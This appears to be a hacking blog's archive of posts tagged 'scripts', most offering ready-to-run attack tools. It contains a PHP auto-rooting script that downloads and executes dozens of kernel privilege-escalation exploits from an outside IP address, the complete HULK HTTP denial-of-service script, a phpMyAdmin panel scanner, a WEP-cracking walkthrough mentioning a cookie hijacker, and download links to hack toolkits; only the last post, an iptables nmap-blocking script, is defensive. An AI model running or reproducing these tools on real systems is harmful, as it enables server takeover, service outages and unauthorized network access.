Showing posts with label scripts. Show all posts
Showing posts with label scripts. Show all posts

Sunday, April 7, 2013

|| Pr0ject Amaterasu Release 1 ||



The script consist of 10 Most used Tools by Hackers and Pentesters.
2 Private scripts , 1 - Subdomain scanner , 2- Ftp Brute forcer.

it is release 1 , In next list , it will contain up 5 private scripts diff from this.
in Final , it will have all Private scripts plus my own coded scripts :)

Download
http://adf.ly/MRyHO 
Read More...

Thursday, February 28, 2013

|| 2013 Auto R00t3r ||


Auto root 2013 Developped by Mauritania Attacker
www.mauritania-sec.com
https://www.facebook.com/mauritanie.forever
Usage:-
chmod 777 the script for example r00t.php
and then launch  ./r00t.php
#!/usr/bin/php 
<?php 
/* 
# Auto root 2013 Developped by Mauritania Attacker
# www.mauritania-sec.com
# https://www.facebook.com/mauritanie.forever
# <3 AnonGhost <3 
*/ 
set_time_limit(0); 
system("clear"); 
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=------------|\n"; 
print "|PHP Auto Root by Mauritania Attacker               |\n"; 
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=------------|\n"; 
print "|Contact: fb.com/mauritanie.forever                 |\n"; 
print "|Priv8 Version                                      |\n"; 
print "|Rooting: Linux and FreeBSD                         |\n"; 
print "|<3 AnonGhost <3                                    |\n"; 
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=------------|\n"; 
sleep(4); 
print "\nKernel to verify:\n"; 
print "lnx or bsd: "; 
$kernel = fgets(STDIN); 
$kernel = trim($kernel); 
if($kernel == "lnx") 

print "|--=--=--=--=--=--=--=--=--=--=--=--=--=----------|\n"; 
print "|PHP Auto Root by Mauritania Attacker             |\n"; 
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=----------|\n"; 
print "|Selected kernel : |Linux arq|                    |\n"; 
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=----------|\n"; 
sleep(2); 
print "\n[+] Testing lnx xpl's please wait.\n"; 
print "[~] Meanwhile smoke a cigaret XD (:\n"; 
sleep(2); 
system("mkdir lnx;cd lnx/"); 

system("wget http://184.22.219.50/xpl/2.6.3all"); 
system("chmod 777 2.6.3all"); 
system("./2.6.3all"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.17"); 
system("chmod 777 2.6.17"); 
system("./2.6.17"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.18"); 
system("chmod 777 2.6.18"); 
system("./2.6.18"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.18-6"); 
system("chmod 777 2.6.18-6"); 
system("./2.6.18-6"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.18-20"); 
system("chmod 777 2.6.18-20"); 
system("./2.6.18-20"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.32"); 
system("chmod 777 2.6.32"); 
system("./2.6.32"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.32_i686"); 
system("chmod 777 2.6.32_i686"); 
system("./2.6.32_i686"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.32nine"); 
system("chmod 777 2.6.32nine"); 
system("./2.6.32nine"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.33"); 
system("chmod 777 2.6.33"); 
system("./2.6.33"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.34"); 
system("chmod 777 2.6.34"); 
system("./2.6.34"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.34-2011"); 
system("chmod 777 2.6.34-2011"); 
system("./2.6.34-2011"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.37"); 
system("chmod 777 2.6.37"); 
system("./2.6.37"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.37rc2"); 
system("chmod 777 2.6.37rc2"); 
system("./2.6.37rc2"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.37-rc2"); 
system("chmod 777 2.6.37-rc2"); 
system("./2.6.37-rc2"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.39-2011"); 
system("chmod 777 2.6.39-2011"); 
system("./2.6.39-2011"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.39-2011-2012"); 
system("chmod 777 2.6.39-2011-2012"); 
system("./2.6.39-2011-2012"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2.6.x"); 
system("chmod 777 2.6.x"); 
system("./2.6.x"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/15"); 
system("chmod 777 15"); 
system("./15"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/2010-1"); 
system("chmod 777 2010-1"); 
system("./2010-1"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/ab"); 
system("chmod 777 ab"); 
system("./ab"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/c"); 
system("chmod 777 c"); 
system("./c"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/el5i386"); 
system("chmod 777 el5i386"); 
system("./el5i386"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/el5x86"); 
system("chmod 777 el5x86"); 
system("./el5x86"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/elflbl"); 
system("chmod 777 elflbl"); 
system("./elflbl"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/exp1"); 
system("chmod 777 exp1"); 
system("./exp1"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/exp2"); 
system("chmod 777 exp2"); 
system("./exp2"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/exp3"); 
system("chmod 777 exp3"); 
system("./exp3"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/exploit"); 
system("chmod 777 exploit"); 
system("./exploit"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/exploit2"); 
system("chmod 777 exploit2"); 
system("./exploit2"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/froot"); 
system("chmod 777 froot"); 
system("./froot"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/glibc"); 
system("chmod 777 glibc"); 
system("./glibc"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/iskorpitx"); 
system("chmod 777 iskorpitx"); 
system("./iskorpitx"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/jessica2"); 
system("chmod 777 jessica2"); 
system("./jessica2"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/pkexec"); 
system("chmod 777 pkexec"); 
system("./pkexec"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/rds-exploit"); 
system("chmod 777 rds-exploit"); 
system("./rds-exploit"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/vmsplice"); 
system("chmod 777 vmsplice"); 
system("./vmsplice"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/xplSUPER"); 
system("chmod 777 xplSUPER"); 
system("./xplSUPER"); 
sleep(1); 
print("[+] all lnx xpl's testeds! exiting!\n"); 
system("id"); 
exit(0); 

elseif($kernel == "bsd") 

print "|--=--=--=--=--=--=--=--=--=--=--=--=--=--------|\n"; 
print "|PHP Auto Root by Mauritania Attacker           |\n"; 
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=--------|\n"; 
print "|Selected kernel : |BSD-arq|                    |\n"; 
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=--------|\n"; 
sleep(2); 
print "\n[+] Testing bsd xpl's please wait.\n"; 
print "[~] Meanwhile smoke a cigaret XD (:\n"; 
sleep(2); 
system("mkdir BSD;cd bsd/"); 

system("wget http://184.22.219.50/xpl/FreeBSD/6.1-09.c"); 
system("gcc -o 6.1-09 6.1-09.c -lpthread"); 
system("chmod 777 6.1-09"); 
system("./6.1-09"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/6.4"); 
system("chmod 777 6.4"); 
system("./6.4"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/7.1-08.c"); 
system("gcc -o 7.1-08 7.1-08.c "); 
system("chmod 777 7.1-08"); 
system("./7.1-08"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/2010"); 
system("chmod 777 2010"); 
system("./2010"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/a.out"); 
system("chmod 777 a.out"); 
system("./a.out"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/cebkmount"); 
system("chmod 777 cebkmount"); 
system("./cebkmount"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/cve-2010-2693"); 
system("chmod 777 cve-2010-2693"); 
system("./cve-2010-2693"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/6.1-09.c"); 
system("gcc -o 6.1-09 6.1-09.c -lpthread"); 
system("chmod 777 6.1-09"); 
system("./6.1-09"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/free7.sh"); 
system("chmod 777 free7.sh"); 
system("./free7.sh"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/l"); 
system("chmod 777 l"); 
system("./l"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/master"); 
system("chmod 777 master"); 
system("./master"); 
sleep(1); 
system("wget http://184.22.219.50/xpl/FreeBSD/w00t.so.1.0"); 
system("chmod 777 w00t.so.1.0"); 
system("./w00t.so.1.0"); 
exit(0); 


//EOF_ 
//2013 
//Priv8 Version  

?>

Read More...

Monday, September 10, 2012

|| WEP cracking using fern-wifi-cracker ||


A very good tutorial by my friend harpreet singh on Wep Cracking. He has used the tool "fern-wifi-cracker" which is easily avaliable on backtrack 5 R3.

So lets begin ...
Go to backtrack --> exploitation tools --> wireless exploitation tools --> 
WLAN exploitation --> fern-wifi-cracker

Now select the wireless interface you have ( it can be wlan0, wlan1 etc..)


























Now there's a button on which you can see wifi logo, click that and it will start the network scanning ( of-course its using airodump here).

Note*: if you double-click anywhere in the tool, you'll get a "settings" dialog box... you can set the channel there and also you can start the xterm.


























Now if you see closely, you'll note that the two buttons below the scan button will get enabled, the first button is the WEP cracking button and the second one is for WPA cracking.

Click the button for WEP cracking


























After clicking that button, a new dialog box will open. you can select the wep network from the list and then you can select the type of attack i.e arp replay attack, chop-chop attack or fragmentation attack. then click "Attack"...


























You'll be able to see the number of ivs are increasing.There's a progress bar at the end of the dialog box.When the progress bar reaches the end, this tool starts aircrack for cracking wifi password


























When the password is cracked, it will be shown at the bottom of the dialog box...

NOW COMES THE INTERESTING PART:
(before going further, i suggest you to connect to the internet for this)

Go to "toolbox" --> Geolocatory tracker.




















Give the bssid of the AP in the text box and click "Trace".




















I think everyone has already guessed what it will show...

YES... INDEED... IT WILL SHOW YOU THE LOCATION OF THE AP ON THE GOOGLE MAPS ... You can see the coordinates as well..




















And also you can see in the toolbox, there's a button for cookie hijacking called "cookie hijacker" ..

ok guys so that's it for now... :-)

Comment Below for any help
Read More...

Monday, August 20, 2012

|| Webroot Hack Tools ||




Webroot Hacktools..A really awesome Toolkit. !!

Download From Here.
Read More...

Monday, June 11, 2012

|| PHPMYADMIN FINDER ||


HERE IS THE PERL SCRIPT WHICH WILL HELP YOU TO FIND PHPMYADMIN PAGE
#!/usr/bin/perl
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
#
#                ////////////////////////////////////
#                        Yakamoz PHPmyadmin Finder v.x.x
#                ////////////////////////////////////
#
#    Title : PHPmyadmin Finder
#    Author: !-Bb0yH4cK3r_Dz-!
#    From : Azarbycan
#    Category : Remote
#    Emails : !-Bb0yH4cK3r_Dz-!@Yahoo.com , !-Bb0yH4cK3r_Dz-!@Hotmail.com , !-Bb0yH4cK3r_Dz-!@Gmail.com
#      
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

    use HTTP::Request;
    use LWP::UserAgent;
      
      
system ("cls");
system ("title !-Bb0yH4cK3r_Dz-! (Yakamoz)...");
print "\t\t/////////////////////////////////////////////////\n";  
print "\t\t_________________________________________________\n";
print "\t\t\t PHPmyadmin Finder v.x.x\n";
print "\t\t\t Coded By !-Bb0yH4cK3r_Dz-!\n";
print "\t\t\t Made In Azarbycan\n";
print "\t\t\t Version In English\n";
print "\t\t_________________________________________________\n";
print "\n\n";
sleep (1);
    print "\n\n";
    print "\t HOST=> (ex: http://www.site.com)\n";
    print "\t HOST=> :";
    $host=<STDIN>;
    chomp($host);
    if($host !~ /http:\/\//) { $host = "http://$host"; };

print "\n\n";
print "\t\t*-*-*-*-*-* Scanning *-*-*-*-*-*\n";
print "\n\n";
@p = ("/phpMyAdmin/",
"/phpmyadmin/",
"/PMA/",
"/admin/",
"/dbadmin/",
"/mysql/",
"/myadmin/",
"/phpmyadmin2/",
"/phpMyAdmin2/",
"/phpMyAdmin-2/",
"/php-my-admin/",
"/phpMyAdmin-2.2.3/",
"/phpMyAdmin-2.2.6/",
"/phpMyAdmin-2.5.1/",
"/phpMyAdmin-2.5.4/",
"/phpMyAdmin-2.5.5-rc1/",
"/phpMyAdmin-2.5.5-rc2/",
"/phpMyAdmin-2.5.5/",
"/phpMyAdmin-2.5.5-pl1/",
"/phpMyAdmin-2.5.6-rc1/",
"/phpMyAdmin-2.5.6-rc2/",
"/phpMyAdmin-2.5.6/",
"/phpMyAdmin-2.5.7/",
"/phpMyAdmin-2.5.7-pl1/",
"/phpMyAdmin-2.6.0-alpha/",
"/phpMyAdmin-2.6.0-alpha2/",
"/phpMyAdmin-2.6.0-beta1/",
"/phpMyAdmin-2.6.0-beta2/",
"/phpMyAdmin-2.6.0-rc1/",
"/phpMyAdmin-2.6.0-rc2/",
"/phpMyAdmin-2.6.0-rc3/",
"/phpMyAdmin-2.6.0/",
"/phpMyAdmin-2.6.0-pl1/",
"/phpMyAdmin-2.6.0-pl2/",
"/phpMyAdmin-2.6.0-pl3/",
"/phpMyAdmin-2.6.1-rc1/",
"/phpMyAdmin-2.6.1-rc2/",
"/phpMyAdmin-2.6.1/",
"/phpMyAdmin-2.6.1-pl1/",
"/phpMyAdmin-2.6.1-pl2/",
"/phpMyAdmin-2.6.1-pl3/",
"/phpMyAdmin-2.6.2-rc1/",
"/phpMyAdmin-2.6.2-beta1/",
"/phpMyAdmin-2.6.2-rc1/",
"/phpMyAdmin-2.6.2/",
"/phpMyAdmin-2.6.2-pl1/",
"/phpMyAdmin-2.6.3/",
"/phpMyAdmin-2.6.3-rc1/",
"/phpMyAdmin-2.6.3/",
"/phpMyAdmin-2.6.3-pl1/",
"/phpMyAdmin-2.6.4-rc1/",
"/phpMyAdmin-2.6.4-pl1/",
"/phpMyAdmin-2.6.4-pl2/",
"/phpMyAdmin-2.6.4-pl3/",
"/phpMyAdmin-2.6.4-pl4/",
"/phpMyAdmin-2.6.4/",
"/phpMyAdmin-2.7.0-beta1/",
"/phpMyAdmin-2.7.0-rc1/",
"/phpMyAdmin-2.7.0-pl1/",
"/phpMyAdmin-2.7.0-pl2/",
"/phpMyAdmin-2.7.0/",
"/phpMyAdmin-2.8.0-beta1/",
"/phpMyAdmin-2.8.0-rc1/",
"/phpMyAdmin-2.8.0-rc2/",
"/phpMyAdmin-2.8.0/",
"/phpMyAdmin-2.8.0.1/",
"/phpMyAdmin-2.8.0.2/",
"/phpMyAdmin-2.8.0.3/",
"/phpMyAdmin-2.8.0.4/",
"/phpMyAdmin-2.8.1-rc1/",
"/phpMyAdmin-2.8.1/",
"/phpMyAdmin-2.8.2/",
"/sqlmanager/",
"/mysqlmanager/",
"/p/m/a/",
"/PMA2005/",
"/pma2005/",
"/phpmanager/",
"/php-myadmin/",
"/phpmy-admin/",
"/webadmin/",
"/sqlweb/",
"/websql/",
"/webdb/",
"/mysqladmin/",
"/mysql-admin/");


foreach $myadmin(@p){

$url = $host.$myadmin;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();

$response = $useragent->request($request);
if ($response->is_success){print "Found : $url\n";}
if ($response->content=~ /Access Denied/){print "Found : $url =>[Error & Access Denied]\n";}
else {print "NotFound : $myadmin\n";}

  

}

Read More...

Wednesday, May 30, 2012

|| Hulk- Http Unbearable Load King ||



0x01 Introduction - This tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them to their knees by exhausting the resource pool, its is meant for research purposes only and any malicious usage of this tool is prohibited.



hulk.py Usage - python hulk.py www.url.com

# ----------------------------------------------------------------------------------------------
# HULK - HTTP Unbearable Load King
#
# this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them
# to their knees by exhausting the resource pool, its is meant for research purposes only
# and any malicious usage of this tool is prohibited.
#
# author :  Barry Shteiman , version 1.0
# ----------------------------------------------------------------------------------------------
import urllib2
import sys
import threading
import random
import re


#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0


def inc_counter():
 global request_counter
 request_counter+=1


def set_flag(val):
 global flag
 flag=val


def set_safe():
 global safe
 safe=1


# generates a user agent array
def useragent_list():
 global headers_useragents
 headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
 headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
 headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
 headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
 headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
 headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
 headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
 headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
 headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
 headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
 headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
 headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
 return(headers_useragents)


# generates a referer array
def referer_list():
 global headers_referers
 headers_referers.append('http://www.google.com/?q=')
 headers_referers.append('http://www.usatoday.com/search/results?q=')
 headers_referers.append('http://engadget.search.aol.com/search?q=')
 headers_referers.append('http://' + host + '/')
 return(headers_referers)


#builds random ascii string
def buildblock(size):
 out_str = ''
 for i in range(0, size):
  a = random.randint(65, 90)
  out_str += chr(a)
 return(out_str)


def usage():
 print '---------------------------------------------------'
 print 'USAGE: python hulk.py <url>'
 print 'you can add "safe" after url, to autoshut after dos'
 print '---------------------------------------------------'




#http request
def httpcall(url):
 useragent_list()
 referer_list()
 code=0
 if url.count("?")>0:
  param_joiner="&"
 else:
  param_joiner="?"
 request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
 request.add_header('User-Agent', random.choice(headers_useragents))
 request.add_header('Cache-Control', 'no-cache')
 request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
 request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
 request.add_header('Keep-Alive', random.randint(110,120))
 request.add_header('Connection', 'keep-alive')
 request.add_header('Host',host)
 try:
   urllib2.urlopen(request)
 except urllib2.HTTPError, e:
   #print e.code
   set_flag(1)
   print 'Response Code 500'
   code=500
 except urllib2.URLError, e:
   #print e.reason
   sys.exit()
 else:
   inc_counter()
   urllib2.urlopen(request)
 return(code) 




#http caller thread
class HTTPThread(threading.Thread):
 def run(self):
  try:
   while flag<2:
    code=httpcall(url)
    if (code==500) & (safe==1):
     set_flag(2)
  except Exception, ex:
   pass


# monitors http threads and counts requests
class MonitorThread(threading.Thread):
 def run(self):
  previous=request_counter
  while flag==0:
   if (previous+100<request_counter) & (previous<>request_counter):
    print "%d Requests Sent" % (request_counter)
    previous=request_counter
  if flag==2:
   print "\n-- HULK Attack Finished --"


#execute
if len(sys.argv) < 2:
 usage()
 sys.exit()
else:
 if sys.argv[1]=="help":
  usage()
  sys.exit()
 else:
  print "-- HULK Attack Started --"
  if len(sys.argv)== 3:
   if sys.argv[2]=="safe":
    set_safe()
  url = sys.argv[1]
  if url.count("/")==2:
   url = url + "/"
  m = re.search('http\://([^/]*)/?.*', url)
  host = m.group(1)
  for i in range(500):
   t = HTTPThread()
   t.start()
  t = MonitorThread()
  t.start()
Read More...

Saturday, May 19, 2012

|| Block Nmap Scans on Your server ||



While browsing the packet storm security, I found a simple Bash script to block the Information disclosing nmap scans. This script is based upon IPTables. so for using this you should have IP tables installed on your server.

Code: 

#!/bin/bash
# To run this file, first give the permission +x and execute this program
# --# chmod +x blocknmap.sh
# --# ./blocknmap.sh


echo "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1"
echo "3                                                                      3"
echo "3     ________   .__          ________                                 3"
echo "7     \______ \  |__|  ______/   __   \     ____    ____    _____      7"
echo "1      |    |  \ |  | /  ___/\____    /   _/ ___\  /  _ \  /     \     1"
echo "3      |        \|  | \___ \    /    /    \  \___ (  <_> )|  Y Y  \    3"
echo "3     /_______  /|__|/____  >  /____/   /\ \___  > \____/ |__|_|  /    3"
echo "7             \/          \/            \/     \/               \/     7"
echo "1                                                                      1"
echo "3              >> The Underground Exploitation Team                    3"
echo "3                                                                      3"
echo "7                                                                      7"
echo "1          [+] Site   : http://www.Dis9.com                            1"
echo "3                                                                      3"
echo "3                                                                      3"
echo "7            ###############################################           7"
echo "1            I'm Liyan Oz Leader of Underground Exploitation           1"
echo "3            ###############################################           3"
echo "3                                                                      3"                                         
echo "7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7"
echo "========================================================================"
echo "=                  Block Nmap Scanning using iptables                  ="
echo "=                         C0ded by Liyan Oz                            ="
echo "=                      http://0nto.wordpress.com                       ="
echo "========================================================================" 
echo ""
echo ""
#=====================
# Enable IP Forward
#---------------------


echo 1 > /proc/sys/net/ipv4/ip_forward


#=====================
# Flush semua rules
#---------------------
/sbin/iptables -F
/sbin/iptables -t nat -F


#=====================
# Block
#---------------------


/sbin/iptables -t filter -A INPUT -p TCP -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -p UDP -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -p ICMP -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -m state --state INVALID -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,FIN FIN -j LOG --log-prefix "FIN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,FIN FIN -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,PSH PSH -j LOG --log-prefix "PSH: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,PSH PSH -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,URG URG -j LOG --log-prefix "URG: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,URG URG -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL ALL -j LOG --log-prefix "XMAS scan: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL ALL -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL NONE -j LOG --log-prefix "NULL scan: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL NONE -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j LOG --log-prefix "pscan: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags SYN,FIN SYN,FIN -j LOG --log-prefix "pscan 2: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags FIN,RST FIN,RST -j LOG --log-prefix "pscan 2: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags FIN,RST FIN,RST -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,FIN -j LOG --log-prefix "SYNFIN-SCAN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,FIN -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,FIN -j LOG --log-prefix "NMAP-XMAS-SCAN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,FIN -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL FIN -j LOG --log-prefix "FIN-SCAN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL FIN -j DROP


/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,SYN,FIN -j LOG --log-prefix "NMAP-ID: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,SYN,FIN -j DROP
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags SYN,RST SYN,RST -j LOG --log-prefix "SYN-RST: "
Read More...